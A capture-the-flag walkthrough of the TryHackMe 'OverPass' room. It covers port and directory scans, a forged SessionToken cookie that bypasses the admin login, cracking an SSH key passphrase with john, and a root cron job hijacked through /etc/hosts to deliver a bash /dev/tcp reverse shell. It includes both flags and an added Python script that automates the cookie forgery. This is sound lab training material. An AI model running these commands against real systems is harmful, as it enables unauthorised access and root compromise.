CTF Walk Through | HackProof Academy



06/11/2024 Shad Hussain
CTF Walk Through - OverPass - THM

Room Link : https://tryhackme.com/room/overpass

STEP1 - port scan

nmap -p- -sSV 10.10.101.201 -Pn -A -T4

FINDING
22/tcp open ssh  OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open http Golang net/http server (Go-IPFS json-rpc or InfluxDB API)

Port 80 is a custom Go (net/http) application rather than a stock web server, so its login handling is the application's own and worth reading.
-----------------------------------------------------------------------------------------------
STEP2 - directory brute force

dirb http://10.10.101.201/

FINDING
==> DIRECTORY: http://10.10.101.201/aboutus/
+ http://10.10.101.201/admin (CODE:301|SIZE:42)
==> DIRECTORY: http://10.10.101.201/css/
==> DIRECTORY: http://10.10.101.201/downloads/
==> DIRECTORY: http://10.10.101.201/img/
+ http://10.10.101.201/index.html (CODE:301|SIZE:0)
---- Entering directory: http://10.10.101.201/aboutus/ ----
+ http://10.10.101.201/aboutus/index.html (CODE:301|SIZE:0)
---- Entering directory: http://10.10.101.201/css/ ----
+ http://10.10.101.201/css/index.html (CODE:301|SIZE:0)
---- Entering directory: http://10.10.101.201/downloads/ ----
+ http://10.10.101.201/downloads/index.html (CODE:301|SIZE:0)
+ http://10.10.101.201/downloads/src (CODE:301|SIZE:0)
---- Entering directory: http://10.10.101.201/img/ ----
+ http://10.10.101.201/img/index.html (CODE:301|SIZE:0)

/admin is the login page. Note /downloads/src as well.
-----------------------------------------------------------------------------------------------
STEP3 - read the login script

Open http://10.10.101.201/admin, view the page source, and open the login.js file it loads.

FINDING

async function login() {
    const usernameBox = document.querySelector("#username");
    const passwordBox = document.querySelector("#password");
    const loginStatus = document.querySelector("#loginStatus");
    loginStatus.textContent = ""
    const creds = { username: usernameBox.value, password: passwordBox.value }
    const response = await postData("/api/login", creds)
    const statusOrCookie = await response.text()
    if (statusOrCookie === "Incorrect credentials") {
        loginStatus.textContent = "Incorrect Credentials"
        passwordBox.value=""
    } else {
        // anything other than the literal "Incorrect credentials" is treated as a session token
        Cookies.set("SessionToken",statusOrCookie)
        window.location = "/admin"
    }
}

The script stores whatever /api/login returns, unless it is exactly the string "Incorrect credentials", in a cookie named SessionToken and then loads /admin. The admin page only checks that a SessionToken cookie is present, not that its value is a real session, so setting the cookie ourselves with any value logs us in without credentials.
-----------------------------------------------------------------------------------------------
STEP4 - forge the session cookie

Install the Cookie-Editor extension (https://addons.mozilla.org/en-US/firefox/addon/cookie-editor/) in the browser. On http://10.10.101.201/admin add a cookie with the name SessionToken and any value (for example 1), save it and refresh the page: you are now logged in to the admin area.
-----------------------------------------------------------------------------------------------
STEP5 - crack the SSH key passphrase

The admin page shows an encrypted RSA private key for the user james. Copy the whole key (from -----BEGIN RSA PRIVATE KEY----- to -----END RSA PRIVATE KEY-----) into a file called ovp.txt, convert it to a john hash with ssh2john and crack the passphrase with rockyou:

python3 /usr/share/john/ssh2john.py /root/Desktop/ovp.txt > /root/Desktop/ovpcrack
john /root/Desktop/ovpcrack --wordlist=/usr/share/wordlists/rockyou.txt

ssh2john writes the hash to stdout, so redirect it into the output file rather than passing the output file as a second argument.

FINDING
james13 (the passphrase of the key, not a login password)
-----------------------------------------------------------------------------------------------
STEP6 - SSH in as james

mv ovp.txt ovp
chmod 600 ovp
ssh -i ovp james@10.10.101.201

ssh refuses a key that other users can read, hence the chmod 600. Enter the passphrase james13 when prompted.
-----------------------------------------------------------------------------------------------
STEP7 - user flag

ls -la
cat user.txt

FINDING
thm{65c1aaf000506e56996822c6281e6bf7}
-----------------------------------------------------------------------------------------------
STEP8 - look for privilege escalation

cat /etc/crontab

FINDING
* * * * * root curl overpass.thm/downloads/src/buildscript.sh | bash

Every minute root downloads buildscript.sh from overpass.thm over plain HTTP and pipes it straight into bash. Whoever controls where overpass.thm resolves controls what root executes.
-----------------------------------------------------------------------------------------------
STEP9 - point overpass.thm at the attacker

First check that james can write /etc/hosts (ls -l /etc/hosts); the edit only works because the file is writable. Then edit it:

nano /etc/hosts

and add or change the overpass.thm line so it resolves to the attacker's VPN IP, for example

10.17.65.196 overpass.thm

The resolver uses the first matching line, so make sure no earlier overpass.thm entry is left above it. Save with Ctrl+X, then Y, then Enter.
-----------------------------------------------------------------------------------------------
STEP10 - stage the malicious build script

On the attacker machine create the same path the cron job requests, downloads/src/buildscript.sh, under the directory you will serve from (here /root/Desktop):

mkdir -p /root/Desktop/downloads/src

Write the following into /root/Desktop/downloads/src/buildscript.sh, using the attacker's VPN IP (the same address you put in /etc/hosts; the example addresses in STEP9 and here differ, use your own in both) and the port the listener will use:

#!/bin/bash
bash -c "bash -i >& /dev/tcp/10.6.63.158/4444 0>&1"
-----------------------------------------------------------------------------------------------
STEP11 - serve the script and catch the shell

On the attacker machine, from the directory that contains downloads/ (here /root/Desktop), start a web server on port 80:

cd /root/Desktop
python3 -m http.server 80

In a second terminal start the listener:

nc -nvlp 4444

The cron job runs every minute, so within about a minute the web server logs a GET for /downloads/src/buildscript.sh and the listener receives a reverse shell running as root.
-----------------------------------------------------------------------------------------------
STEP12 - root flag

In the reverse shell:

whoami
ls -la
cat root.txt

FINDING
root
thm{7f336f8c359dbac18d54fdd64ea753bb}
-----------------------------------------------------------------------------------------------
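The cookie forgery and key retrieval of STEP3 to STEP5 done from a script instead of a browser extension, as an added example that is not part of the original walkthrough. The host and the SessionToken cookie name come from the steps above; SAMPLE_ADMIN_HTML is constructed for the offline check and the key inside it is a placeholder, not a real key; the output file name ovp is the one STEP6 uses.

```python
"""Fetch /admin with a forged SessionToken cookie and pull out the private key.

Added example for this walkthrough (not the original post's code).  Host and
cookie name come from the steps above; SAMPLE_ADMIN_HTML is constructed for
the offline test and its key is a placeholder, not a real key.
"""
import os
import re
import sys
import urllib.request

COOKIE_NAME = "SessionToken"
DEFAULT_HOST = "10.10.101.201"


def fetch_admin(host=DEFAULT_HOST, token="forged"):
    """Return the body of http://<host>/admin requested with a forged cookie.

    login.js stores whatever /api/login returns (anything but the literal string
    "Incorrect credentials") as the SessionToken cookie, and /admin only checks
    that the cookie exists, so any value gets past the login.
    """
    req = urllib.request.Request(
        f"http://{host}/admin", headers={"Cookie": f"{COOKIE_NAME}={token}"}
    )
    with urllib.request.urlopen(req, timeout=10) as resp:
        return resp.read().decode("utf-8", errors="replace")


# A PEM private key block; the END label must repeat the BEGIN label.
KEY_RE = re.compile(
    r"-----BEGIN (?P<kind>[A-Z ]*PRIVATE KEY)-----.*?-----END (?P=kind)-----",
    re.DOTALL,
)


def extract_private_key(html):
    """Return the first PEM private key in html with indentation removed, or None.

    The page prints the key inside its HTML, possibly indented; ssh and ssh2john
    need every line to start at column 0.
    """
    match = KEY_RE.search(html)
    if match is None:
        return None
    return "\n".join(line.strip() for line in match.group(0).splitlines()) + "\n"


def is_passphrase_protected(pem):
    """True if a traditional RSA PEM key carries the Proc-Type: 4,ENCRYPTED header.

    Only meaningful for "RSA PRIVATE KEY" PEM: OpenSSH-format keys record the
    encryption inside the base64 body, not in a header line.
    """
    return any("ENCRYPTED" in line for line in pem.splitlines()[:4])


def save_key(pem, path="ovp"):
    """Write the key with mode 600 (ssh refuses keys other users can read)."""
    with open(path, "w") as fh:
        fh.write(pem)
    os.chmod(path, 0o600)
    return path


# Constructed stand-in for the real /admin page; the key body is a dummy.
SAMPLE_ADMIN_HTML = """<html><body>
<h1>Overpass Administrator area</h1>
<p>James's SSH key (constructed placeholder, not a real key):</p>
<pre>
    -----BEGIN RSA PRIVATE KEY-----
    Proc-Type: 4,ENCRYPTED
    DEK-Info: AES-128-CBC,00000000000000000000000000000000

    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    -----END RSA PRIVATE KEY-----
</pre>
</body></html>
"""

if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else DEFAULT_HOST
    key = extract_private_key(fetch_admin(target))
    if key is None:
        sys.exit("no private key on /admin: is the SessionToken check really bypassed?")
    path = save_key(key)
    if is_passphrase_protected(key):
        print(f"saved {path}; encrypted key, run ssh2john and john for the passphrase")
    else:
        print(f"saved {path}; key is not passphrase protected")
```

Run it as `python3 grab_key.py 10.10.101.201` (file name assumed); if it reports an encrypted key, continue with the ssh2john and john commands from STEP5.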

© mutebreak.com | All Rights Reserved